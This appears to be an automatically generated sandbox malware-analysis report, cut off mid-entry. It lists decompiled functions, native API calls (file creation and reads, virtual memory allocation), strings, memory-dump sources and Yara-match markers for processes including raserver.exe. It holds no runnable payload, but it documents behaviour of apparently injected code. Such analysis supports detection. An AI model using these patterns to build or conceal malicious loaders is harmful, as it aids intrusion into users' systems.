Function 00E7E759, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00E7E759(void* __edx, void* __eflags, intOrPtr _a4, signed short* _a8, char _a11, intOrPtr _a12) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				short _v30;
				signed int _v32;
				char _v40;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short* _t47;
				intOrPtr _t50;
				short _t67;
				signed int _t79;
				signed int _t83;
				void* _t86;
				signed short* _t87;
				intOrPtr _t88;
				void* _t89;

				_t87 = _a8;
				_t79 = 0;
				_v8 = 0;
				_t47 = E00E18375(_t87, 0x3d);
				if(_t47 == 0) {
					L23:
					__eflags = 0;
					return 0;
				}
				 *_t47 = 0;
				_t83 =  *_t87 & 0x0000ffff;
				_t92 = _t83 - 0x53;
				if(_t83 != 0x53) {
					__eflags = _t83 - 0x4f;
					if(_t83 != 0x4f) {
						goto L23;
					}
					_t50 = E00EB5AA6(_t47 + 2,  &_v24, 0x10);
					_t89 = _t89 + 0xc;
					_v8 = _t50;
					__eflags = _t50;
					if(__eflags == 0) {
						goto L23;
					}
					_a11 = 1;
					L6:
					_push(_a4);
					_t86 = E00E7E6F3(_t92);
					if(_t86 == _t79) {
						goto L23;
					}
					_t88 = ( *(_t86 + 0x14) & 0x0000ffff) + _t86 + 0x18;
					if(0 >=  *(_t86 + 6)) {
						L22:
						return 1;
					} else {
						goto L8;
					}
					do {
						L8:
						if( *((intOrPtr*)(_t88 + 0xc)) != 0 &&  *((intOrPtr*)(_t88 + 8)) != 0) {
							if(_a11 != 0) {
								_t28 = _t79 + 1; // 0x1
								__eflags = _v8 - _t28;
								if(__eflags != 0) {
									L19:
									if(_a11 != 0) {
										goto L21;
									}
									L20:
									E00E0E1C6( &_v40);
									goto L21;
								}
								L18:
								_v12 =  *((intOrPtr*)(_t88 + 8));
								_v16 =  *((intOrPtr*)(_t88 + 0xc)) + _a4;
								_push( &_v20);
								_push(_a12);
								_push( &_v12);
								_push( &_v16);
								E00E00048(0xffffffff);
								_push(_v20);
								_push(_v12);
								_push(_v16);
								E00E53F92(0x55, 3, "Set 0x%X protection for %p section for %d bytes, old protection 0x%X\n", _a12);
								_t89 = _t89 + 0x1c;
								if(_a11 != 0) {
									goto L22;
								}
								goto L19;
							}
							_t67 = 8;
							_v30 = _t67;
							_v28 = _t88;
							_v32 = 0;
							while( *((char*)((_v32 & 0x0000ffff) + _t88)) != 0) {
								_v32 = _v32 + 1;
								_t100 = _v32 - 8;
								if(_v32 < 8) {
									continue;
								}
								break;
							}
							_push(1);
							_push( &_v32);
							_push( &_v40);
							if(E00E0E755(_t79, _t86, _t88, _t100) < 0) {
								goto L23;
							}
							if(E00E1BAA4( &_v48,  &_v40, 1) != 0) {
								goto L20;
							}
							goto L18;
						}
						L21:
						_t79 = _t79 + 1;
						_t88 = _t88 + 0x28;
					} while (_t79 < ( *(_t86 + 6) & 0x0000ffff));
					goto L22;
				}
				E00E0E2A8(_t83,  &_v48, _t47 + 2);
				_a11 = 0;
				goto L6;
			}

0x00e7e763
0x00e7e769
0x00e7e76c
0x00e7e76f
0x00e7e778
0x00e7e8cd
0x00e7e8cd
0x00000000
0x00e7e8cd
0x00e7e780
0x00e7e783
0x00e7e786
0x00e7e78a
0x00e7e79e
0x00e7e7a2
0x00000000
0x00000000
0x00e7e7b2
0x00e7e7b7
0x00e7e7ba
0x00e7e7bd
0x00e7e7bf
0x00000000
0x00000000
0x00e7e7c5
0x00e7e7c9
0x00e7e7c9
0x00e7e7d1
0x00e7e7d5
0x00000000
0x00000000
0x00e7e7df
0x00e7e7e9
0x00e7e8c9
0x00000000
0x00000000
0x00000000
0x00000000
0x00e7e7ef
0x00e7e7ef
0x00e7e7f3
0x00e7e807
0x00e7e85a
0x00e7e85d
0x00e7e860
0x00e7e8aa
0x00e7e8ae
0x00000000
0x00000000
0x00e7e8b0
0x00e7e8b4
0x00000000
0x00e7e8b4
0x00e7e862
0x00e7e865
0x00e7e86e
0x00e7e874
0x00e7e875
0x00e7e87b
0x00e7e87f
0x00e7e882
0x00e7e887
0x00e7e88a
0x00e7e88d
0x00e7e89c
0x00e7e8a1
0x00e7e8a8
0x00000000
0x00000000
0x00000000
0x00e7e8a8
0x00e7e80b
0x00e7e80c
0x00e7e812
0x00e7e815
0x00e7e819
0x00e7e823
0x00e7e827
0x00e7e82c
0x00000000
0x00000000
0x00000000
0x00e7e82c
0x00e7e82e
0x00e7e833
0x00e7e837
0x00e7e83f
0x00000000
0x00000000
0x00e7e856
0x00000000
0x00000000
0x00000000
0x00e7e858
0x00e7e8b9
0x00e7e8bd
0x00e7e8be
0x00e7e8c1
0x00000000
0x00e7e7ef
0x00e7e794
0x00e7e799
0x00000000

APIs

_wcstoul.LIBCMT ref: 00E7E7B2

Strings

], xrefs: 00E7E75B
Set 0x%X protection for %p section for %d bytes, old protection 0x%X, xrefs: 00E7E893

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcstoul
String ID: Set 0x%X protection for %p section for %d bytes, old protection 0x%X$]
API String ID: 1097018459-2671679092
Opcode ID: f94d4f2472f2c092b4ff51477beed3a44511414991544fbfee4df45cdc963192
Instruction ID: 4248cee891a1ea77a9983372c59a35a0d23f6297687b208f89a698d5f2611190
Opcode Fuzzy Hash: f94d4f2472f2c092b4ff51477beed3a44511414991544fbfee4df45cdc963192
Instruction Fuzzy Hash: F241A572C00249AAEF149FE4C881BEE77F8EF08314F14D4AAE515B6290E774D984D751

Uniqueness

Uniqueness Score: -1.00%

Function 00E3C558, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00E3C5C4

Strings

1, xrefs: 00E3C56F
{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 00E3C5BB

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: 1${%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
API String ID: 48624451-1603231898
Opcode ID: 230c51bba7ea36ebaa70c8c2060c84d1972cad2933669bc1d377fb07ba6e37f5
Instruction ID: 11f5c83a675145a3c4cced358ea104ca02bff02a56b65ecfc1a0c48556f7e279
Opcode Fuzzy Hash: 230c51bba7ea36ebaa70c8c2060c84d1972cad2933669bc1d377fb07ba6e37f5
Instruction Fuzzy Hash: ED01C4A60086B075D32087AB5C10833FFF99FCEA15728C08EF6D89A292E13BC542D770

Uniqueness

Uniqueness Score: -1.00%

Function 00E7E8DB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00E7E8DB(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				short* _t8;
				void* _t10;
				void* _t18;
				void* _t20;

				_t18 = __edx;
				_t1 =  &_a8; // 0xe5e35d
				_t8 = E00E18375( *_t1, 0x2c);
				if(_t8 != 0) {
					 *_t8 = 0;
					_t10 = E00EB5AA6(_t8 + 2,  &_v8, 0x10);
					_t20 = _t10;
					_t30 = _t20;
					if(_t20 != 0) {
						_t23 = _a4;
						_push(_t20);
						_t4 = _t23 + 0x24; // 0x24
						E00E53F92(0x55, 3, "CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X\n", _a8);
						_t10 = E00E7E759(_t18, _t30,  *((intOrPtr*)(_a4 + 0x18)), _a8, _t20);
					}
					return _t10;
				}
				return _t8;
			}

0x00e7e8db
0x00e7e8e3
0x00e7e8e6
0x00e7e8ef
0x00e7e8f4
0x00e7e901
0x00e7e906
0x00e7e90b
0x00e7e90d
0x00e7e910
0x00e7e913
0x00e7e914
0x00e7e924
0x00e7e933
0x00e7e938
0x00000000
0x00e7e939
0x00e7e93b

APIs

_wcstoul.LIBCMT ref: 00E7E901

Part of subcall function 00EB5AA6: __cftof.LIBCMT ref: 00EB5AB6

Strings

], xrefs: 00E7E8E3
CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X, xrefs: 00E7E91B

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: __cftof_wcstoul
String ID: CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X$]
API String ID: 1831096779-2103298067
Opcode ID: 5eef9e829a1c94ba49aa2b0735b9bbe96b8353cf4074b3e38fdbb82e45b20445
Instruction ID: 6e16ea01410ba9ea1878bd85072d820be197e1cb4ba444eae09e5d2e4fb9b900
Opcode Fuzzy Hash: 5eef9e829a1c94ba49aa2b0735b9bbe96b8353cf4074b3e38fdbb82e45b20445
Instruction Fuzzy Hash: 13F0F0371402047ADB242A59EC07FDB77EDDF94B20F049159FE08BA1D1EAB1EA0097A0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: raserver.exe PID: 2332 Parent PID: 1388 raserver.exeCOMMON

Executed Functions

Function 00099D4A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D

Strings

.z`, xrefs: 00099D8D, 00099D98
wK, xrefs: 00099D6C, 00099D78

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`$wK
API String ID: 823142352-635088003
Opcode ID: 39f7fd9580be4f2750499bdbc059f3a69fd8599422dfe3482be4f40338f08685
Instruction ID: 244cb6f096e8958426e7a2dd202c689e47d7b1e75f4e229f4d4f16c75e9b7838
Opcode Fuzzy Hash: 39f7fd9580be4f2750499bdbc059f3a69fd8599422dfe3482be4f40338f08685
Instruction Fuzzy Hash: 7A11D6B6605209AFCB08DF98DC91DEB77A9BF8D314F15864CFA5D97242D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00099D50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK,007A002E,00000000,00000060,00000000,00000000), ref: 00099D9D

Strings

.z`, xrefs: 00099D8D, 00099D98
wK, xrefs: 00099D6C, 00099D78

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`$wK
API String ID: 823142352-635088003
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 0a441b4dce64d7bec0249cb88b86821ea0342ac4fd6d7c1531e9a6fcd94e2e80
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 60F0BDB2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA1D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00099E4B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45

Strings

=K, xrefs: 00099E6C, 00099E74

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: =K
API String ID: 2738559852-3114500539
Opcode ID: 06ec9ca0ab7343d022c250f7449f403da6fefc5c3990b38f07bd6c7ac528a376
Instruction ID: 46092eddb29539306244d53f28ac1308e4a06e036028416f4bf838c459dce4f9
Opcode Fuzzy Hash: 06ec9ca0ab7343d022c250f7449f403da6fefc5c3990b38f07bd6c7ac528a376
Instruction Fuzzy Hash: B901E5B6200104ABCB14DF98DC95DEB77ADEF8C354F158659FE5D97242C630E9118BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00099DFA, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 5893e18c3d23afe0b6a8fcbea6cbb6ca87e12e52bfd756b5f19629e3681d4471
Instruction ID: d8171302e74941fa69ad3f32b6bc46f0c5242533b16c584c654135b75b115cc1
Opcode Fuzzy Hash: 5893e18c3d23afe0b6a8fcbea6cbb6ca87e12e52bfd756b5f19629e3681d4471
Instruction Fuzzy Hash: 17F0F9B6200108AFCB04DF88CC85EEB77A9BF8C754F018248BE1D97241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00099E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,000949F1,?,?,?,?,000949F1,FFFFFFFF,?,2M,?,00000000), ref: 00099E45

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: fead514cabe4814d174c9c8fb60ffadff092d031a689921e6f23a6cb00221d16
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 10F0A4B2200208AFCB14DF89DC91EEB77ADAF8C754F158248BE1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00099F2B, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F69

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 6ace070e22f2e2a713292f765dda60c4a23cf55fb1a3ef3cd82135332226282b
Instruction ID: 495d262e39e4e8ed6da7bc36c84e1ed0474da4d165823364cedf07daa1c4d864
Opcode Fuzzy Hash: 6ace070e22f2e2a713292f765dda60c4a23cf55fb1a3ef3cd82135332226282b
Instruction Fuzzy Hash: 6EF05EB5650145ABCB14DF98DC86EA77BA8EF89350F148659B95897202C634D811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00099F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 00099F69

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 49c918a45e5b2d10f2cbb8b42365379f4a3975464c59e5165204c3099a04dbe1
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 67F015B2200208AFCB14DF89CC81EEB77ADAF88750F118148BE1897241C630F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00099E7A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00094D10,?,?,00094D10,00000000,FFFFFFFF), ref: 00099EA5

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 9e55a5eba178c5472be857c644bee997fa47be966277bea2c014e823ea19c1cb
Instruction ID: 9268f9af3b8ff7a602bf7e8d1aeab0bd8062387f6e043664d3dabc9a873365e4
Opcode Fuzzy Hash: 9e55a5eba178c5472be857c644bee997fa47be966277bea2c014e823ea19c1cb
Instruction Fuzzy Hash: A4E012756002146BD710FBD4CC45EE77B59EF45760F154495BA5C5B242D570FA00C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00099E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00094D10,?,?,00094D10,00000000,FFFFFFFF), ref: 00099EA5

Memory Dump Source

Source File: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 7bafa5a8a84721917e68a6eceee91e07c96d2fc345112c48b1fd92cb674e3066
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 38D01776600214ABDB10EB98CC86EE77BACEF49760F154499BA5C9B242C530FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 021500C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 021500CF

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 021507AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 021507B7

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0214FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0214FAC3

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 0214FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0214FADB

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0214FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0214FAF3

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0214FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0214FB5B

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 0214FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0214FB73

Memory Dump Source

Source File: 00000007.00000002.2353209485.0000000002140000.00000040.00000001.sdmp, Offset: 02130000, based on PE: true

Associated: 00000007.00000002.2353204810.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353300121.0000000002220000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353304963.0000000002230000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353309981.0000000002234000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353314392.0000000002237000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353318475.0000000002240000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2353349741.00000000022A0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0214FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0214FBC3

Memory Dump Source

